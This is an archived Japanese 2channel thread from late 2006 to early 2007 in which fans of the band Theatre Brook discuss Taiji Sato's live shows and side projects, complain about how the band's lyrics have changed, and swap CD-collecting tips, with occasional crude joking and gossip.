130 :名無しさん@お腹いっぱい。:2006/12/31(日) 13:39:44 ID:Qfylq7j40
妖怪元気・・・に朝帰りw
夕べから今朝にかけて、六本木ヒルズ「マドラウンジ」のサンパウロに参加しましたっ。
凄・・・凄い凄い凄い・・・何て言うか・・みんな元気でハッピーw
サンパウロっていつもあんなにおきゃくをハジケさせてしまうのでしょうか。びっくり。
しかも、お一人様のハジケ専有面積が予想外に広いのにもびっくりです。
ふと気付くと、自分の立ち位置が激変しているではありませんか・・・。ハジケ専有面積率大でしたw
夕べはマルコス・スザーノ氏、そしてフェルナンド・モウラ氏までもがゲスト参加しての沼澤尚氏、森俊之氏、佐藤タイジ氏のサンパウロ。
きっとこれ以上はないのでしょう実力派アーティスト方によるところの演奏を目の前で聴ける幸せな時間。
でも、みんながあまりにバキバキだったので、もう演奏を忘れてしまいそうっていうか、私忘れてしまいました。でも上手だった!!!
至って大人〜な私には、「NOTHING BUT THE MIDNIGHT FLASH GROOVE」が似合っているかも。
先日の高円寺のNBTMFGにも行ったのですが、超満員でSOLD OUTしていました。もう少しで入れないところでした。
真夜中のライブって「ライブは真夜中に行うべき!」って思う程に、感動が倍増するということを最近発見。
お仕事する人にもピッタリだし、とても余裕を持って参加出来ますし、秘密めいていてとってもリフレッシュ出来る。良い事ずくめだと思います。
沼澤さんは本当に・・・素晴らしいし格好良い・・・と改めて認識しました。(お肌の色も綺麗)
年齢を増すごとに、ダメにならないでどんどん良くなる演奏家って素敵ですね。人として魅力的。
でもサンパウロもまた行きたい! サンパウロ行ったら体質改善されそうな気がしますし。

「マドラウンジ」わくわくと入ろうとした途端に「ちょっと待ってお嬢さん・・・」
VIPと関係者しかラウンジに入れないところをなぜか侵入させてもらったw(だってこれ楽しみだったんだもん)
で、中はなんと!・・・真っ暗。良く見えない。「夜は夜景」まさに「マドラウンジ」なのですね。夜景が最高に美しかった。
あっ、松雪さんも来ていて普通にノッていて・・・リカちゃん人形を100倍に拡大した様な(イメージ的にはリカちゃんのママw)キュートさでした。
まゆみちゃんっていうモデルも来ていました。やっぱりお人形さんでした。でも私的には松雪さんの勝ち。
佐藤タイジ氏の奥様も初めて拝見。ここでやや美人って言った人・・・とっても美人じゃないですか!
私の頭の中のタイジ氏妻像は古内東子だったのです・・・。全然違った。

良い年末です・・・でも年末の準備何も出来ていないです。

                             



131 :名無しさん@お腹いっぱい。:2006/12/31(日) 21:26:12 ID:MQ5ZvtDz0
古内東子のはずないだろ。
それじゃやや美人なんて書かないよ。
前から小さい「やや」美人だよ。それ以下でも以上でもない。


132 :名無しさん@お腹いっぱい。:2006/12/31(日) 22:25:09 ID:Qfylq7j40
どうしても「やや」ですかw
様子から工藤静香みたいな人柄を想像しましたが、そうですか?

それにしてもこれだけ長文・・・・・そこだけピックアップしなくても〜w

133 :名無しさん@お腹いっぱい。:2006/12/31(日) 22:33:00 ID:Qfylq7j40
と言っても私、工藤静香の人柄を知りません。

134 :名無しさん@お腹いっぱい。:2006/12/31(日) 23:35:12 ID:cN4cwYnyO
妖怪。。。

135 : 【末吉】 【891円】 :2007/01/01(月) 10:14:35 ID:ERM6aRD+O
妖怪!レポdwさて何が出るかな?
今年のTHEATRE運は…

136 : 【吉】 【638円】 :2007/01/01(月) 10:15:58 ID:ERM6aRD+O
もっかい!

137 :名無しさん@お腹いっぱい。:2007/01/04(木) 20:34:08 ID:fAKcRd/qO
えっちゃん愛してるよえっちゃん

138 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:50:30 ID:HrryFaO00
吉沢氏、与西氏も来てたらしいね、リキッド

139 :名無しさん@お腹いっぱい。:2007/01/06(土) 23:48:34 ID:AbNthf460
偶然itunesでTaiji All Starsの曲みつけて買ってみた。
Star Navigationが「まばたき」に似てると思った。

数年ぶりにシアターブルックのCDひっぱりだしていろいろ聞いてみた

140 :名無しさん@お腹いっぱい。:2007/01/06(土) 23:50:41 ID:AbNthf460
っていうか>>77で既出だったね
ごめんね
ひさしぶりでうれしかったんだ

141 :名無しさん@お腹いっぱい。:2007/01/07(日) 03:18:51 ID:5iEgKLzJO
>>139
>>140
TaigiAllStarsのNewSingle本当に良いと思う。発売以来ず〜っと聴き続けているのに、私は全く飽きがこない。ずっと聴くと普通は飽きてくる筈なのに…。シアターブルックっていいなと改めて思う。ライブが楽しみ。

142 :名無しさん@お腹いっぱい。:2007/01/07(日) 04:05:52 ID:aB/vw5lk0
「WISDOMの告知」凝視に耐えるいいオンナとオトコの夜w
タイジのコメント読んだけど、前からそうなんだと思うけど、
クリエーターとか、いい大人の女とかオシャレして集まってさ。
なんか身内でオレタチ、イケテルでしょ〜?って言いたい感じだよね。
タイジの音楽や歌詞や発言その他、前よりナイーブなとこが
なくなってきたと思わない?
そりゃ前から変なとこはあったよ。でもさ、サンパウロ主流とか
ゲスト入れたり嫁の店とタイアップしたりなんだりしだしてから、
徳島出身って感じなくなったね。
いや前より地方から出てきた大人の遊び人て感じになったのかなぁ。
とにかく前の方がミュージシャンとしても人間としても
もうちょっと何か輝きやら素朴さがあった気がするんだ。

143 :名無しさん@お腹いっぱい。:2007/01/07(日) 06:10:42 ID:Bb5ie6880
洗練されたけど土臭さはなくなった。
五枚目「I am〜」くらいまではあった気がすんだけどさ。
衣装のカンジもオサレになったけどワイルドではなくなった。



144 :名無しさん@お腹いっぱい。:2007/01/07(日) 07:11:28 ID:EmHf9Gm40
アーティストにとって
「マンネリ」と言われるよりは「昔は…だったのに」と言われる方がマシなんだろうな。

タイジの変化が受け容れられないならファン辞めればいいのに
ストーカーじゃあるまいし

145 :名無しさん@お腹いっぱい。:2007/01/07(日) 17:51:24 ID:ne2SheWs0
SEXが以前より弱そうに見えるところが
最大の変化だな。

146 :名無しさん@お腹いっぱい。:2007/01/07(日) 19:31:26 ID:5iEgKLzJO
前のタイジ知りませんが、確かに前の歌詞が好きです。
知的でナイーブな感じで、天才…って思います。

147 :名無しさん@お腹いっぱい。:2007/01/07(日) 20:07:25 ID:29PRHmFi0
歌詞はもちろん服も昔のが好き。昔はダサい中に可愛い・・
と思える服で、ダサいのかオシャレなのかわからないところが
良かった。今は面白さがない。
土臭さはなくなってきて、ちょっとタイジは油臭くなったかも。
SEXは弱そうになったというより、がマンネリしてるっぽい。
なんか落ち着いちゃったところで遊んでいる。
もっと果てしない所へ、次元へと駆りたててたんじゃなかったの?



148 :名無しさん@お腹いっぱい。:2007/01/08(月) 16:57:52 ID:Am4FZUsHO
たしかにサンパウロ始めたあたりからはクソみたいな歌詞しか書けてないな
それでもライブが神だから離れられないんだよな


149 :名無しさん@お腹いっぱい。:2007/01/09(火) 00:41:21 ID:tSFzU5kg0
「シアターは変わり続ける変わらないもの」
といいながら、
「変わっちゃいけないところが変わっちまった」
とこがイケてない。

150 :名無しさん@お腹いっぱい。:2007/01/10(水) 00:48:29 ID:G4dymjQo0
結論は簡単。吉澤さんが戻ってくればいい。

彼の、遊び心がある曲やライブがよかったんだよ。
今の曲は幅がなさすぎるし、ライブは長いばかりでつまらん。

151 :名無しさん@お腹いっぱい。:2007/01/10(水) 06:41:05 ID:YIHDB7Q7O
シアター、真心、バイン、スガシカ、辺りでFUNKイベントしてほしい〜
女性コーラス真城さん
初期ファンカデリックとか中期スライ位の重いファンクで…たまらずオナニー開始

152 :名無しさん@お腹いっぱい。:2007/01/10(水) 20:06:56 ID:22mbyzHMO
ヨッシーはいらん
タイジのボーカルもいらん
延々とギターカキムシレ

153 :名無しさん@お腹いっぱい。:2007/01/10(水) 23:43:07 ID:5+6/uT5lO
携帯からスマソ・・・
■本日の新着ニュース
[サディスティック・ミカ・バンド]一夜限りのライブ
※[Taiji All Stars]豪華アルバム&ツアー
[小西康陽]CD付バレンタインチョコ発売
[ミドリカワ書房]劇団ひとりとコラボ


⇒スペースシャワーモバイル
http://i.ssmobile.com/index.cgi?m=2&uid=NULLGWDOCOMO


154 :名無しさん@お腹いっぱい。:2007/01/15(月) 05:34:05 ID:2DBjOadR0
保守ついでにみんなアケオメ。
えっちゃんもアケオメ。そしてもう来るな。

んで、不可能とは思うが>>150に禿げしく同意。
>>152はサンパウロ行った方がよくね?
タイジの巧くないVoがあってこそのシアター。

しかしクアトロの先行取ったけど、番号死ぬほど早かったぞ…
どれだけファン逃げてんだよタイジ。

155 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:07:32 ID:GwWDSRB50
>>154
アケオメなんて要らない。どうして「もう来るな」なのか訳を言いたまえ。

156 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:11:26 ID:sk6sib15O
シアターになくなった遊び心がサンパウロで出てると思うな。
サンパウロ見てると、何でシアターでこれしないんだろうと疑問に思ったりする。

157 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:33:06 ID:GwWDSRB50
>>155
仕事に神なんて持ち出すなウリャって言ったから?

158 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:36:13 ID:X1osuZYvO
そこら中に溢れてるゴミ女よりも妖怪えっちゃんの方が良いよ

159 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:38:53 ID:GwWDSRB50
自分に言っちゃった
>>154
70歳の神学者でも言えない様なことを語るなオリャって言ったから?

 


160 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:46:44 ID:GwWDSRB50
>>158
意に反することを述べるとゴミ女・・・その発想が既に平和じゃないのよ。

161 :名無しさん@お腹いっぱい。:2007/01/15(月) 11:45:54 ID:X1osuZYvO
>>160
勝手にゴミ女を定義するなよ

162 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:43:15 ID:4xohSOmx0
  ワケ     ワカ     ラン♪
  ∧_∧   ∧_∧    ∧_∧
 ( ・∀・)  ( ・∀・)   ( ・∀・)
⊂ ⊂  )  ( U  つ  ⊂__へ つ
 < < <    ) ) )     (_)|
 (_(_)  (__)_)    彡(__)

163 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:44:04 ID:iFiOlsHu0
タイジ年明けのうたばんににもちらっと出てたな

164 :名無しさん@お腹いっぱい。:2007/01/22(月) 02:12:35 ID:dcIkW6Rg0
えっちゃんが出てくると一気に過疎るな、このスレw
それ以前にネタもないか。

165 :名無しさん@お腹いっぱい。:2007/01/22(月) 08:46:00 ID:21lna8qaO
最近シアター好きになってアルバム集めてるんだけど
今あんまり活動してないんですね…ションボリ
あふれだすばかりのシングル買ってからハマりました

166 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:23:21 ID:UA7wxSOBO
過疎るも何も、シアターの話題書いてるのにスルー・・・
えっちゃんとやらを話題に出すやつ何なんだ
相手にするやつのほうが荒らしと化してるの自覚してるのかな

167 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:43:58 ID:UA7wxSOBO
>>165
初期から順番に集めてるねかな?
私もあふれだすばかりから入った。
昔テレビ番組のエンディングか何かでPV流れてたのが出会いで
何の番組か、どんな番組かも全く覚えてないけど
タイジの顔と涙〜♪なめて〜なめて〜♪という歌詞のインパクトが強烈だったw
な、何なんだコレ!!と思って急いでバンド名をメモったw

168 :名無しさん@お腹いっぱい。:2007/01/22(月) 18:49:33 ID:I5qWD95j0
あふれだすばかり、大好きなのに私が行ったライブでは聴いたことないっす。
今のバンド形式でも良いっすか?

169 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:03:38 ID:dcIkW6Rg0
そりゃヨッシーいた方が締まるよね>あふれだすばかり。
俺が最後に聴いたのは一昨年の年末リキッドだったかなぁ。

今はあのスクラッチのパートってタカさんの独壇場だった希ガス。
あれはあれでカッコよす。なんてったって曲が良いからね。

170 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:52:45 ID:3nZRdcrpO
あふれだすばかり…

171 :名無しさん@お腹いっぱい。:2007/01/22(月) 22:52:49 ID:F0flrPed0
ああ、あの頃はエロさ炸裂してたのになぁ・・・。

172 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:45:56 ID:YIXAoZ4W0
私はドレッドライダーではまったよ。
今ちょっと遠のいてるけど。あふれだすばかり・・
エロくてカッコ良いよね。最後に聞いたのは4年前くらいかな?
あの「なめて〜」って、(誰かに)涙を舐めてよ〜なの?
(自分が)涙をなめるような経験したよ〜なの?
どっちなんだろう?

173 :名無しさん@お腹いっぱい。:2007/01/24(水) 00:24:57 ID:1WoghQU/0
(誰かに)涙を舐めてよ〜 と思う。
詩人ですね。
仕立てられたストーリーじゃなく、
作ったときの感性に従っている感じがとてもする。
だからか、こころに響く詩ばかり。
かっこいい。


174 :名無しさん@お腹いっぱい。:2007/01/25(木) 01:44:07 ID:7LzpnsA40
あふれだすばかり・・インタビューでたしか失恋して書いたって
タイジ言ってたよね。最初、散弾銃ってタイトルだったとか。
なんかあの頃のタイジ、シアターが懐かしいな〜
タイジは成長したってより、キャラが変ったよね。
無邪気がなくなった?生で会えば無邪気なのかな?今でも。

175 :名無しさん@お腹いっぱい。:2007/01/25(木) 09:07:23 ID:SvvY375oO
昔は肯定的な大きな愛が溢れてた

今はなんか小さいんだよ
否定的だし

176 :名無しさん@お腹いっぱい。:2007/01/25(木) 10:10:25 ID:16dcnMSVO
凄まじい恋愛をするべきでは。たとえ結婚していようとも。対象が誰であろうとも。
特にクリエイターは、生きている限り敏感でいなければ。
でないと、愛や平和のメッセージが説得力を無くし、人の心の奥底にまるで響かなくなる。
個人が丸く平和になり過ぎたら、芸術家は終わりでは。
あれだけの詩を書く人なのだもの、
ズシッと心の奥底に響く、本物の詩を歌声を期待してる。

177 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:51:43 ID:+ho4Y1PP0
>>175
ソレダ!
思えば、大統領やめてくーれない、と拳を振り上げさせられるようになってから
だんだんシアター熱が冷めていったような気がする。

178 :名無しさん@お腹いっぱい。:2007/01/25(木) 16:05:24 ID:+Pwf4waI0
「大統領やめてくーれない」の前に「オレタチフューチャー」
あたりから、なんかなぁ??って感じになっていったな。
思えばほんとに昔は「肯定的な大きな愛」だったね。
5枚目から、小さな愛傾向になって政治批判が強くなって。
タイジは丸く平和にもなってない気がする。
それならそれで、変っても別の何かを感じるだろう。
なんか小さくなったんじゃない?陳腐になって、
普通の一般人的な平和や愛や葛藤を歌う・・
それが悪いんじゃなくて、それは別の得意なミュージシャンにまかせて。
タイジの奥底にあったモノと違うでしょ?と言いたい。
タイジはタイジで、本来の方向で花開いてほしい。


179 :名無しさん@お腹いっぱい。:2007/01/25(木) 17:53:56 ID:mRlAjQAu0
>>178
タイジが変わったのか?
まわりが変わったのか?

180 :名無しさん@お腹いっぱい。:2007/01/27(土) 10:42:08 ID:OYfN+AhkO
敢えてage!
今日のスペ坂行く人いないのかぁぁぁ〜


181 :名無しさん@お腹いっぱい。:2007/01/29(月) 22:28:55 ID:UI7/ry1WO
デザインノートという雑誌にタイジ氏が載ってます。
マイナーな雑誌なので、大きい本屋に行かないとないかもしれませんが。

182 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:22:47 ID:sniH9W9+0
今日North Wave(札幌)で流れた
feat. UAの曲、ヤバすぎ。鼻血出た。

183 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:32:20 ID:3cOE75oG0
>>182
うわっ楽しみだ。

birdとSAKURAは下手したら売れるんじゃね?ってくらい好かった。

hitomiのがあんま好くなくて、松雪のはまあまあだった。

184 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:47:33 ID:yuzzfbZw0
早くアルバムにまとめて欲すぃ

185 :名無しさん@お腹いっぱい。:2007/02/02(金) 04:45:44 ID:mIDsBmOKO
あと3週間我慢汁

186 :名無しさん@お腹いっぱい。:2007/02/02(金) 16:09:22 ID:cQ/q8tO60
次のフィーチャリングはズバリ「明川哲也」
シアターに合っていると思うのは私だけでしょうか?
あの人最高ですよねっ。

187 :名無しさん@お腹いっぱい。:2007/02/02(金) 16:12:17 ID:cQ/q8tO60
きっと良いファンが増えますよ〜〜

188 :名無しさん@お腹いっぱい。:2007/02/02(金) 16:55:42 ID:fN92NuJq0
ドリアンのどこが合ってるのか…聞く気もしない。
TAIJI ALL STARSのコンセプトって、女Vo.だし。
根本から勘違いしてるんじゃね?

わざわざ連カキしてるから相手してあげるけど、
もう二度と来るな え っ ち ゃ ん 。

189 :名無しさん@お腹いっぱい。:2007/02/02(金) 17:12:25 ID:cQ/q8tO60
すみません冗談だったのに・・・また相手してね

190 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:25:31 ID:LxzJ1cIe0
feat.にシングルマザー多いのな
SAKURAもbirdもUAも松雪さんもだよね

191 :名無しさん@お腹いっぱい。:2007/02/02(金) 23:50:59 ID:cQ/q8tO60
子持ちシングルであることがフィーチャリングされる為の必須条件か・・・
フィーチャリングされたいが為に、結婚して子供を産んで離婚する女性が続出しますね。
勿論、出演者用託児所、オムツ換えシート及びミルク用ポット付きライブなのでしょうね。


192 :名無しさん@お腹いっぱい。:2007/02/05(月) 13:21:58 ID:o7MMzMcq0
今回はツタヤでレンタルにしとこ。

193 :名無しさん@お腹いっぱい。:2007/02/05(月) 17:33:54 ID:oRrPH7KI0
買ったんだけれど、トラウマになっちゃって全く聴いてない。

194 :名無しさん@お腹いっぱい。:2007/02/05(月) 20:32:51 ID:o7MMzMcq0
なんで?

195 :名無しさん@お腹いっぱい。:2007/02/06(火) 18:18:37 ID:hxyZczMIO
なんでって!
沼澤さんのホストパフォーマンス振りにショックを受けたからですよ。
沼澤さんはチンドンやですか!

196 :名無しさん@お腹いっぱい。:2007/02/06(火) 18:21:51 ID:hxyZczMIO
ゆる〜して欲しいっ僕は正直者でぇ〜♪

197 :名無しさん@お腹いっぱい。:2007/02/06(火) 18:50:47 ID:CqujJjTM0
>195 あっ、そういうこと

198 :名無しさん@お腹いっぱい。:2007/02/06(火) 20:04:40 ID:kZptOclWO
三串にまで沼澤と松雪のトピ立てるなよ…orz
糞ライブ決定だな

199 :名無しさん@お腹いっぱい。:2007/02/12(月) 08:01:43 ID:QkGa1hUdO
同郷(つд`。)けどLEYONA…スペル忘れたorzとの曲は掴み所がない…
松雪さんライジングの時は良かったけど…
タイジはもう何したいんだか…

200 :名無しさん@お腹いっぱい。:2007/02/12(月) 11:55:36 ID:I3TSd1qU0
あまりにもLEYONAに感動した・・・今度熱く語ってしまお。
LEYONAは本物でした・・・!!!!!!!

201 :名無しさん@お腹いっぱい。:2007/02/12(月) 17:57:14 ID:Xkbg2lI4O
Taiji all starsである意味いろんなもの出し切ってシアターが良い方向に行くと思うが。
暮れのシアターのライブでもソニー時代の曲中心だったし、
ここの住人の喜ぶような感じになるんじゃないかな。俺はどっちでも良いけど。

202 :名無しさん@お腹いっぱい。:2007/02/12(月) 19:47:02 ID:7ewPjffX0
そりゃよかった

203 :名無しさん@お腹いっぱい。:2007/02/13(火) 00:12:31 ID:MNTlQfhR0
暮れのライブで以前の定番曲ばかりだったのは
軽くリハすればできる曲ばかりだったって考えてみ。
何にも生み出そうともしてない。グダグタ。


204 :名無しさん@お腹いっぱい。:2007/02/13(火) 19:12:03 ID:sB3hblXfO
むしろライブで昔の曲だけやってくれたら何も文句は言わない

205 :名無しさん@お腹いっぱい。:2007/02/15(木) 01:37:27 ID:lSFDMSFD0
荒吐決まったね。
さあ遠征だ。

206 :名無しさん@お腹いっぱい。:2007/02/15(木) 09:53:01 ID:bfIQyrsJ0
いいなあ・・
私もミュージシャンになりたい
なりたいなりたいなりたい

207 :名無しさん@お腹いっぱい。:2007/02/16(金) 19:11:35 ID:i5X4wpgDO
売れないミュージシャン
アマチュアミュージシャン
なんちゃってミュージシャン
ミュージシャン風
みゆーじしゃん


208 :名無しさん@お腹いっぱい。:2007/02/17(土) 09:18:46 ID:/19ARA/Q0
肯定的な大きな愛

それは彼女だけにいったみたい......



209 :名無しさん@お腹いっぱい。:2007/02/17(土) 14:06:04 ID:qaaLT/hi0
>>208さんの言いたいことって
どういう意味なのだろうなあ......


210 :名無しさん@お腹いっぱい。:2007/02/18(日) 19:30:22 ID:K/eXXShDO
みんなギターマガジン見た?

211 :名無しさん@お腹いっぱい。:2007/02/18(日) 20:25:18 ID:bab1AD7e0
タイジの奥さんってまぁ綺麗で小さくてガリガリの人だよね。
胸とか全然ないんじゃない?胎児はでかい胸が好きだったはずだけど。

212 :名無しさん@お腹いっぱい。:2007/02/19(月) 19:01:02 ID:z3/sJqjZ0
でかい胸は一時の憧れだけで、実際はぺちゃガリで若く見えて、
カッコもぶっとんでる、支配欲が満たされる小さい体に、
顔は一応可愛い・・。性格はでしゃばらず、アーパーでもなく、
自分に従う・・色々ついてきてくれるし、ベタついてくれて
頼ってくれるが頼り過ぎない。
ファッションの仕事してるってのがタイジにはカッコ良く
感じるし、それでSEXの相性が合えば最高!ってなるんじゃない。
つまりタイジにぴったりの・・勿体無いくらいの嫁なのかもね。
だが、タイジのファンはあの結婚に関する言動でガックリした。
色々大きな愛なんか歌ってても、小さな愛でとてもわかりやすい
世間的な恋愛と結婚観で、さらにわりと大騒ぎもしたし、
クサい愛の喜びとやらを語りすぎたから。
相手もアパレル特有の、でも昭和の香りのする音楽関係なしの
ファンっぽい・・そんな人だったから、バカップルに感じてしまった。
今は落ち着いていいムードをかもしだしてるのだろうか。。

213 :名無しさん@お腹いっぱい。:2007/02/19(月) 19:08:15 ID:bkm0yBXBO
「まばたき」を中古で買ったんですが、このCDは帯ってついてますか?

214 :名無しさん@お腹いっぱい。:2007/02/19(月) 19:23:26 ID:L+07qqSN0
>212
感情移入しすぎ

215 :名無しさん@お腹いっぱい。:2007/02/19(月) 19:59:33 ID:m/gtshT40
>>213
付いてる。盤は8cmだけど。

216 :名無しさん@お腹いっぱい。:2007/02/19(月) 22:54:30 ID:bkm0yBXBO
>>215
ありがとう!
やっぱついてるか…orz

帯とかこだわるんけど、何年も探しててやっと見つけたからなくても即買いしました。

たしかに8a…当時はマキシケースなのにCDは8aってよくあったから懐かしい(´・ω・)

217 :名無しさん@お腹いっぱい。:2007/02/20(火) 01:14:43 ID:qX+ph2xS0
チェック


218 :名無しさん@お腹いっぱい。:2007/02/20(火) 09:41:53 ID:YIsRWaci0
>>216
市場から消えた後もライブ物販とかでは結構売ってたんだけどね。


219 :名無しさん@お腹いっぱい。:2007/02/20(火) 20:48:42 ID:v3xjMmt+O
>>218
やっぱり会場とかにはあるんですね。
ここ数年探し続けてやっとみつけたけど、シアターブルックのCDって中古じゃほとんど見かけない…
やっぱりファンは手放さないってことかな…


220 :名無しさん@お腹いっぱい。:2007/02/20(火) 22:30:49 ID:EPLKuWw/0
TALISMANからVIRACOCHAまで(台風含む)は結構叩き売りされてて、
スペシャル以降が殆ど見ない印象。俺なんか500円以下のTALISMAN
10枚以上買ってる。=布教活動用に
シングルはノックとソウルダイバーだけ見るかも。他はあんまり。

思うに、単純に市場に流通してる数の問題(ry

そんなことより、FEMME FATALE誰も聴いてないんですかね?


221 :名無しさん@お腹いっぱい。:2007/02/21(水) 00:23:46 ID:vrBX90hN0
>>220
布教活動用に10枚!!す、スゴイね。
FEMME FATALE聴いてるよ。COLDFEETがヤバイ出来。

参加アーティスト豪華だけど…世間から忘れ去られる作品になりそう。

222 :名無しさん@お腹いっぱい。:2007/02/21(水) 09:28:59 ID:e6Jlc9WsO
>>220
「FEMME FATALE」 って、もう発売されているんですね。
どうしてもっと大きく宣伝しないのです?

223 :名無しさん@お腹いっぱい。:2007/02/21(水) 09:51:31 ID:e6Jlc9WsO
>>221
芸能人を使って宣伝したでしょう。失敗したけれど。
あれをしなければ、参加した個々のアーティストの持つ媒体を駆使して、
もっと広範囲に熱く普及出来た筈だと思うのだ。
あの品の無い宣伝が、女性アーティストのプロモーション意欲を低下させたと思うなあ。
皆口になど出す筈もありませんが、プライドの有る「女性」プラス「アーティスト」な訳ですから。
私はそんな風に思うのです。

224 :名無しさん@お腹いっぱい。:2007/02/22(木) 14:43:11 ID:rpyNxThX0
>>222=223

携帯からとはいえ、何でここまで常人には理解できない文が書けるかな・・・

225 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:46:19 ID:lNJaO3K7O
今からスペシャにタイジ出るぞー

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)